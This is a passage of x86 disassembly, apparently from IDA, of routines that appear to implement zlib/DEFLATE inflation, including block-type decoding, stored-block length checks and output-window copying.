sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42AD7B: ; CODE XREF: sub_42A17E+BA0�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 8
loc_42AD84: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AECD�o
mov [ebp+arg_8], 1
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42ADE6: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AED1�o
mov [ebp+arg_8], 0FFFFFFFDh
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp short loc_42AEA9
; ---------------------------------------------------------------------------
loc_42AE45: ; CODE XREF: sub_42A17E+75�j
mov [ebp+arg_8], 0FFFFFFFEh
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp short loc_42AEA9
; ---------------------------------------------------------------------------
loc_42AEA4: ; CODE XREF: sub_42A17E+186�j
; sub_42A17E+2BF�j ...
jmp loc_42A1E7
; ---------------------------------------------------------------------------
loc_42AEA9: ; CODE XREF: sub_42A17E+228�j
; sub_42A17E+3A6�j ...
mov esp, ebp
pop ebp
retn
sub_42A17E endp
; ---------------------------------------------------------------------------
off_42AEAD dd offset loc_42A203 ; DATA XREF: sub_42A17E+7E�r
dd offset loc_42A32C
dd offset loc_42A529
dd offset loc_42A62E
dd offset loc_42A7F5
dd offset loc_42A8E0
dd offset loc_42AAFC
dd offset loc_42AC9A
dd offset loc_42AD84
dd offset loc_42ADE6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AED5 proc near ; CODE XREF: sub_42AEEE+4E�p
; sub_42B09D+10BC�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
pop ebp
retn
sub_42AED5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AEEE proc near ; CODE XREF: sub_42AFA5+E9�p
; sub_42C405+D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jz short loc_42AF02
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov edx, [ecx+3Ch]
mov [eax], edx
loc_42AF02: ; CODE XREF: sub_42AEEE+7�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 4
jz short loc_42AF12
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 5
jnz short loc_42AF29
loc_42AF12: ; CODE XREF: sub_42AEEE+1A�j
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
loc_42AF29: ; CODE XREF: sub_42AEEE+22�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 6
jnz short loc_42AF44
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_42AED5
add esp, 8
loc_42AF44: ; CODE XREF: sub_42AEEE+41�j
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax+1Ch], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+20h], 0
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [edx+34h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
mov [edx+30h], ecx
mov edx, [ebp+arg_0]
cmp dword ptr [edx+38h], 0
jz short loc_42AFA3
push 0
push 0
push 0
mov eax, [ebp+arg_0]
call dword ptr [eax+38h]
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov [ecx+3Ch], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
mov [edx+30h], ecx
loc_42AFA3: ; CODE XREF: sub_42AEEE+92�j
pop ebp
retn
sub_42AEEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AFA5 proc near ; CODE XREF: sub_42DBE5+13E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 40h
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_42AFCE
mov eax, [ebp+var_4]
jmp loc_42B099
; ---------------------------------------------------------------------------
loc_42AFCE: ; CODE XREF: sub_42AFA5+1F�j
push 5A0h
push 8
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+20h]
add esp, 0Ch
mov ecx, [ebp+var_4]
mov [ecx+24h], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+24h], 0
jnz short loc_42B00F
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_0]
call dword ptr [eax+24h]
add esp, 8
xor eax, eax
jmp loc_42B099
; ---------------------------------------------------------------------------
loc_42B00F: ; CODE XREF: sub_42AFA5+4D�j
mov ecx, [ebp+arg_8]
push ecx
push 1
mov edx, [ebp+arg_0]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_0]
call dword ptr [ecx+20h]
add esp, 0Ch
mov edx, [ebp+var_4]
mov [edx+28h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+28h], 0
jnz short loc_42B063
mov ecx, [ebp+var_4]
mov edx, [ecx+24h]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_0]
call dword ptr [eax+24h]
add esp, 8
xor eax, eax
jmp short loc_42B099
; ---------------------------------------------------------------------------
loc_42B063: ; CODE XREF: sub_42AFA5+8D�j
mov ecx, [ebp+var_4]
mov edx, [ecx+28h]
add edx, [ebp+arg_8]
mov eax, [ebp+var_4]
mov [eax+2Ch], edx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [ecx+38h], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
push 0
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_42AEEE
add esp, 0Ch
mov eax, [ebp+var_4]
loc_42B099: ; CODE XREF: sub_42AFA5+24�j
; sub_42AFA5+65�j ...
mov esp, ebp
pop ebp
retn
sub_42AFA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B09D proc near ; CODE XREF: sub_42DD65+3F3�p
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
mov eax, [edx+4]
mov [ebp+var_1C], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+20h]
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_42B0EB
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_54], ecx
jmp short loc_42B0F7
; ---------------------------------------------------------------------------
loc_42B0EB: ; CODE XREF: sub_42B09D+3B�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_54], eax
loc_42B0F7: ; CODE XREF: sub_42B09D+4C�j
mov ecx, [ebp+var_54]
mov [ebp+var_18], ecx
loc_42B0FD: ; CODE XREF: sub_42B09D:loc_42C3C4�j
mov edx, [ebp+arg_0]
mov eax, [edx]
mov [ebp+var_58], eax
cmp [ebp+var_58], 9
ja loc_42C365
mov ecx, [ebp+var_58]
jmp off_42C3CD[ecx*4]
loc_42B119: ; CODE XREF: sub_42B09D+121�j
; DATA XREF: HLXc:off_42C3CD�o
cmp [ebp+var_14], 3
jnb loc_42B1C3
cmp [ebp+var_1C], 0
jz short loc_42B132
mov [ebp+arg_8], 0
jmp short loc_42B18D
; ---------------------------------------------------------------------------
loc_42B132: ; CODE XREF: sub_42B09D+8A�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B18D: ; CODE XREF: sub_42B09D+93�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_42B119
; ---------------------------------------------------------------------------
loc_42B1C3: ; CODE XREF: sub_42B09D+80�j
mov eax, [ebp+var_C]
and eax, 7
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
and ecx, 1
mov edx, [ebp+arg_0]
mov [edx+18h], ecx
mov eax, [ebp+var_10]
shr eax, 1
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 3
ja loc_42B3A1
mov ecx, [ebp+var_5C]
jmp off_42C3F5[ecx*4]
loc_42B1F4: ; CODE XREF: sub_42B09D+75�j
; DATA XREF: HLXc:off_42C3F5�o
mov edx, [ebp+var_C]
shr edx, 3
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, 3
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
and ecx, 7
mov [ebp+var_10], ecx
mov edx, [ebp+var_C]
mov ecx, [ebp+var_10]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, [ebp+var_10]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 1
jmp loc_42B3A1
; ---------------------------------------------------------------------------
loc_42B231: ; CODE XREF: sub_42B09D+75�j
; sub_42B09D+150�j
; DATA XREF: ...
mov edx, [ebp+arg_4]
push edx
lea eax, [ebp+var_2C]
push eax
lea ecx, [ebp+var_24]
push ecx
lea edx, [ebp+var_20]
push edx
lea eax, [ebp+var_28]
push eax
call sub_42CF5B
add esp, 14h
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_28]
push edx
call sub_42A129
add esp, 14h
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_42B2DA
mov [ebp+arg_8], 0FFFFFFFCh
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B2DA: ; CODE XREF: sub_42B09D+1D9�j
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov dword ptr [edx], 6
jmp loc_42B3A1
; ---------------------------------------------------------------------------
loc_42B2FA: ; CODE XREF: sub_42B09D+75�j
; sub_42B09D+150�j
; DATA XREF: ...
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov dword ptr [edx], 3
jmp loc_42B3A1
; ---------------------------------------------------------------------------
loc_42B31A: ; CODE XREF: sub_42B09D+75�j
; sub_42B09D+150�j
; DATA XREF: ...
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aInvalidBlockTy ; "invalid block type"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B3A1: ; CODE XREF: sub_42B09D+147�j
; sub_42B09D+18F�j ...
jmp loc_42C3C4
; ---------------------------------------------------------------------------
loc_42B3A6: ; CODE XREF: sub_42B09D+75�j
; sub_42B09D+3AC�j
; DATA XREF: ...
cmp [ebp+var_14], 20h
jnb loc_42B44E
cmp [ebp+var_1C], 0
jz short loc_42B3BF
mov [ebp+arg_8], 0
jmp short loc_42B41A
; ---------------------------------------------------------------------------
loc_42B3BF: ; CODE XREF: sub_42B09D+317�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B41A: ; CODE XREF: sub_42B09D+320�j
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_14]
add eax, 8
mov [ebp+var_14], eax
jmp loc_42B3A6
; ---------------------------------------------------------------------------
loc_42B44E: ; CODE XREF: sub_42B09D+30D�j
mov ecx, [ebp+var_C]
not ecx
shr ecx, 10h
and ecx, 0FFFFh
mov edx, [ebp+var_C]
and edx, 0FFFFh
cmp ecx, edx
jz short loc_42B4DE
mov eax, [ebp+arg_0]
mov dword ptr [eax], 9
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+18h], offset aInvalidStoredB ; "invalid stored block lengths"
mov [ebp+arg_8], 0FFFFFFFDh
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B4DE: ; CODE XREF: sub_42B09D+3CA�j
mov edx, [ebp+var_C]
and edx, 0FFFFh
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov [ebp+var_14], 0
mov ecx, [ebp+var_14]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jz short loc_42B50C
mov [ebp+var_60], 2
jmp short loc_42B51C
; ---------------------------------------------------------------------------
loc_42B50C: ; CODE XREF: sub_42B09D+464�j
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
neg ecx
sbb ecx, ecx
and ecx, 7
mov [ebp+var_60], ecx
loc_42B51C: ; CODE XREF: sub_42B09D+46D�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_60]
mov [edx], eax
jmp loc_42C3C4
; ---------------------------------------------------------------------------
loc_42B529: ; CODE XREF: sub_42B09D+75�j
; DATA XREF: HLXc:0042C3D5�o
cmp [ebp+var_1C], 0
jnz short loc_42B58A
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B58A: ; CODE XREF: sub_42B09D+490�j
cmp [ebp+var_18], 0
jnz loc_42B6F6
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz short loc_42B5E4
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+28h]
jz short loc_42B5E4
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_42B5D2
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_64], edx
jmp short loc_42B5DE
; ---------------------------------------------------------------------------
loc_42B5D2: ; CODE XREF: sub_42B09D+522�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_64], ecx
loc_42B5DE: ; CODE XREF: sub_42B09D+533�j
mov edx, [ebp+var_64]
mov [ebp+var_18], edx
loc_42B5E4: ; CODE XREF: sub_42B09D+500�j
; sub_42B09D+50E�j
cmp [ebp+var_18], 0
jnz loc_42B6F6
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
mov [ebp+arg_8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_42B633
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_68], ecx
jmp short loc_42B63F
; ---------------------------------------------------------------------------
loc_42B633: ; CODE XREF: sub_42B09D+583�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_68], eax
loc_42B63F: ; CODE XREF: sub_42B09D+594�j
mov ecx, [ebp+var_68]
mov [ebp+var_18], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+2Ch]
jnz short loc_42B695
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_0]
mov eax, [ecx+30h]
cmp eax, [edx+28h]
jz short loc_42B695
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_42B683
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_6C], eax
jmp short loc_42B68F
; ---------------------------------------------------------------------------
loc_42B683: ; CODE XREF: sub_42B09D+5D3�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_6C], edx
loc_42B68F: ; CODE XREF: sub_42B09D+5E4�j
mov eax, [ebp+var_6C]
mov [ebp+var_18], eax
loc_42B695: ; CODE XREF: sub_42B09D+5B1�j
; sub_42B09D+5BF�j
cmp [ebp+var_18], 0
jnz short loc_42B6F6
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B6F6: ; CODE XREF: sub_42B09D+4F1�j
; sub_42B09D+54B�j ...
mov [ebp+arg_8], 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jbe short loc_42B714
mov ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
loc_42B714: ; CODE XREF: sub_42B09D+66F�j
mov edx, [ebp+var_10]
cmp edx, [ebp+var_18]
jbe short loc_42B722
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
loc_42B722: ; CODE XREF: sub_42B09D+67D�j
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_8]
push eax
call sub_431764 ; memcpy
add esp, 0Ch
mov ecx, [ebp+var_4]
add ecx, [ebp+var_10]
mov [ebp+var_4], ecx
mov edx, [ebp+var_1C]
sub edx, [ebp+var_10]
mov [ebp+var_1C], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_10]
mov [ebp+var_8], eax
mov ecx, [ebp+var_18]
sub ecx, [ebp+var_10]
mov [ebp+var_18], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jz short loc_42B777
jmp loc_42C3C4
; ---------------------------------------------------------------------------
loc_42B777: ; CODE XREF: sub_42B09D+6D3�j
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
neg ecx
sbb ecx, ecx
and ecx, 7
mov edx, [ebp+arg_0]
mov [edx], ecx
jmp loc_42C3C4
; ---------------------------------------------------------------------------
loc_42B78E: ; CODE XREF: sub_42B09D+75�j
; sub_42B09D+794�j
; DATA XREF: ...
